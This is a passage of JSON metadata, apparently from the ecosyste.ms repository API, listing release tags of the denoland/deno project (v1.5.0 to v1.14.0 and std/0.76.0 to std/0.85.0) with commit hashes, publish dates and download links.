d":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"h